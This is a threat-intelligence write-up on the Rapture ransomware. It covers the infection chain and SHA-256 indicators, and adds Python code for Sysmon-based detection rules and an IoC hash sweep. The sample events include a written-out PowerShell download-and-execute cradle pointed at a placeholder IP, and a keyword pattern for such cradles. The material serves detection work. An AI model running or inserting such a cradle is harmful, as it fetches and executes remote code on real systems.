
Researchers have uncovered a new ransomware family, dubbed Rapture, that takes a minimalistic approach and leaves only a small footprint on infected systems.
Rapture shares traits with the Paradise ransomware, such as its RSA key configuration file and its dependence on the .NET Framework 4.0 to run. It differs in that it was found injected into legitimate processes, and in some cases the attackers dropped it on disk as a *.log file. Rapture appends six characters to the names of encrypted files and requires specific command-line arguments to run properly.
The ransom note dropped by Rapture resembles the one used by the Zeppelin ransomware, although no other link between the two has been identified.
The infection chain begins with reconnaissance: the attackers inspect firewall policies, check the installed PowerShell version, and search for applications running vulnerable Log4j versions. They then download and execute a PowerShell script that installs a Cobalt Strike beacon on the target system.
Initial access comes through vulnerable public-facing websites and servers. The attackers then use an unusual privilege-escalation technique to run the payload: they inject into an existing svchost.exe process, which launches explorer.exe with the /NOUACCHECK command-line switch. That explorer.exe instance drops and executes the second-stage Cobalt Strike beacon downloader.
The second-stage downloader retrieves the main Cobalt Strike beacon from a remote address. The beacon then contacts another path on the same C&C server to receive backdoor commands and further payloads. The server's response is embedded inside JavaScript code, which the beacon decodes before use.
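As an added example (not code from Trend Micro or from the Rapture operators), the following Python shows how a detection engineer might encode two observable steps of this chain as rules over Sysmon-style process-creation records: explorer.exe started by svchost.exe with the /NOUACCHECK switch, and a PowerShell command line carrying a download-and-execute cradle. The sample events are constructed; the w3wp.exe parent, the example URL and the cradle keywords are assumptions, since the report does not give the exact command lines used.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation (Event ID 1) records. None of these
# are real telemetry; they mimic the chain in the write-up plus benign noise.
SAMPLE_EVENTS = [
    # Initial-access stage: a web-server worker spawning a PowerShell download
    # cradle (parent process and URL are assumptions, not from the report).
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/a'))"},
    # Escalation step described in the report: svchost.exe -> explorer.exe /NOUACCHECK
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\explorer.exe /NOUACCHECK"},
    # Benign: the normal logon path for explorer.exe (parent userinit.exe, no switch)
    {"ParentImage": r"C:\Windows\System32\userinit.exe",
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
    # Benign: an administrator running a local script without a download cradle
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

# Keywords typical of PowerShell download-and-execute cradles (assumed list).
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bIEX\b|Invoke-Expression",
    re.I,
)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def rule_explorer_nouaccheck(ev: dict) -> bool:
    """explorer.exe launched by svchost.exe with /NOUACCHECK: the report's escalation step."""
    return (_base(ev["Image"]) == "explorer.exe"
            and _base(ev["ParentImage"]) == "svchost.exe"
            and "/nouaccheck" in ev["CommandLine"].lower())


def rule_powershell_cradle(ev: dict) -> bool:
    """powershell.exe whose command line contains a download-and-execute cradle."""
    return _base(ev["Image"]) == "powershell.exe" and bool(CRADLE_RE.search(ev["CommandLine"]))


RULES = {
    "powershell_download_cradle": rule_powershell_cradle,
    "rapture_explorer_nouaccheck": rule_explorer_nouaccheck,
}


def detect(events):
    """Return (rule_name, command_line) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev["CommandLine"]))
    return hits


if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The parent-process condition is what keeps the explorer.exe rule tight: explorer.exe is normally started by userinit.exe at logon, and some installers legitimately pass /NOUACCHECK, so the svchost.exe parent is the part of the report's description worth alerting on.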
On most affected systems, the researchers found that the ransomware activity was carried out by the beacon process itself, indicating that the ransomware code is downloaded and executed in memory. Examination of the Cobalt Strike beacon's watermark suggests that Rapture's operators use a pirated Cobalt Strike license, one that several other threat actors also use.
Recommendation
Organisations should adopt a multifaceted approach that secures every potential entry point, including endpoints, email, web, and the network. Security solutions that can detect malicious components and suspicious activity help enterprises defend against ransomware attacks such as this one.
This research was documented by researchers from Trend Micro.
Indicators of Compromise (SHA-256 hashes)
- c417a89cdc86ea6d674d2dc629ae1872b4054ac43e948e8ed60d3f3f47178598
- a6cd727a18e5e2a80fbd8a51c299a2030bd5e68e4bbf136e07eb9d0b3f3bb8ce
- 619614cda94a4b6b185c0c122d11ef2b8b0b3e7fc94a1a5c2ff1ac49233df54b
- 4222681314f5ffd69fe17ab2ae4b9aaa60866571fe2b53afc10f87e3738cedda
- b44b4e162de1decc9a5d3c61a045eb4776c55fccd33c9eced5b9f622faee19fa
- 367e13f234a46822aa9655690f18000319123ad07a62e56bcf8bebbfbb0de7b9
- 99331170be7aa48d572728f68e52ac8d3eb3c8307cb8050ce504ef9f4624a4ba
- d793aaaba1b4b34a20432b86505b851d838def0cd722b8cbdd1d08e19a08b6ee
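To put the hash list to use, here is an added example (not from Trend Micro's report) that sweeps a directory tree and flags any file whose SHA-256 digest appears in the list. It deliberately hashes every file regardless of extension, because the report notes the payload was sometimes dropped as a *.log file. The demo() helper creates a throwaway directory with a constructed harmless file purely to exercise the code.

```python
import hashlib
import sys
import tempfile
from pathlib import Path

# SHA-256 hashes copied from the Indicators of Compromise list above.
RAPTURE_IOCS = frozenset({
    "c417a89cdc86ea6d674d2dc629ae1872b4054ac43e948e8ed60d3f3f47178598",
    "a6cd727a18e5e2a80fbd8a51c299a2030bd5e68e4bbf136e07eb9d0b3f3bb8ce",
    "619614cda94a4b6b185c0c122d11ef2b8b0b3e7fc94a1a5c2ff1ac49233df54b",
    "4222681314f5ffd69fe17ab2ae4b9aaa60866571fe2b53afc10f87e3738cedda",
    "b44b4e162de1decc9a5d3c61a045eb4776c55fccd33c9eced5b9f622faee19fa",
    "367e13f234a46822aa9655690f18000319123ad07a62e56bcf8bebbfbb0de7b9",
    "99331170be7aa48d572728f68e52ac8d3eb3c8307cb8050ce504ef9f4624a4ba",
    "d793aaaba1b4b34a20432b86505b851d838def0cd722b8cbdd1d08e19a08b6ee",
})


def sha256_file(path, chunk_size=1 << 20) -> str:
    """Stream a file through SHA-256 so large files never have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def sweep(root, iocs=RAPTURE_IOCS):
    """Hash every regular file under root; return (path, digest) for IoC matches.

    No extension filter is applied on purpose: the report notes Rapture was at
    times dropped under a *.log name, so filtering on .exe/.dll would miss it.
    """
    matches = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            digest = sha256_file(path)
        except OSError:  # unreadable or vanished file; keep sweeping
            continue
        if digest in iocs:
            matches.append((str(path), digest))
    return matches


def demo():
    """Constructed self-check: sweep a temp dir holding one harmless file, first
    against the real IoC set (expect 0 hits), then against a set that also
    contains that file's own hash (expect 1 hit). Returns (real_hits, planted_hits)."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp) / "update.log"  # .log name mirrors the report's observation
        sample.write_bytes(b"constructed sample content, not malware\n")
        real_hits = sweep(tmp)
        planted_hits = sweep(tmp, RAPTURE_IOCS | {sha256_file(sample)})
    return len(real_hits), len(planted_hits)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for found, digest in sweep(sys.argv[1]):
            print(f"IOC match: {found} {digest}")
    else:
        print("demo (real hits, planted hits):", demo())
```

Run it with a directory argument to sweep a real path; without one it only runs the constructed self-check. A hash match is strong evidence but a miss is not a clean bill of health, since the report describes the ransomware code being executed in memory without necessarily leaving a file to hash.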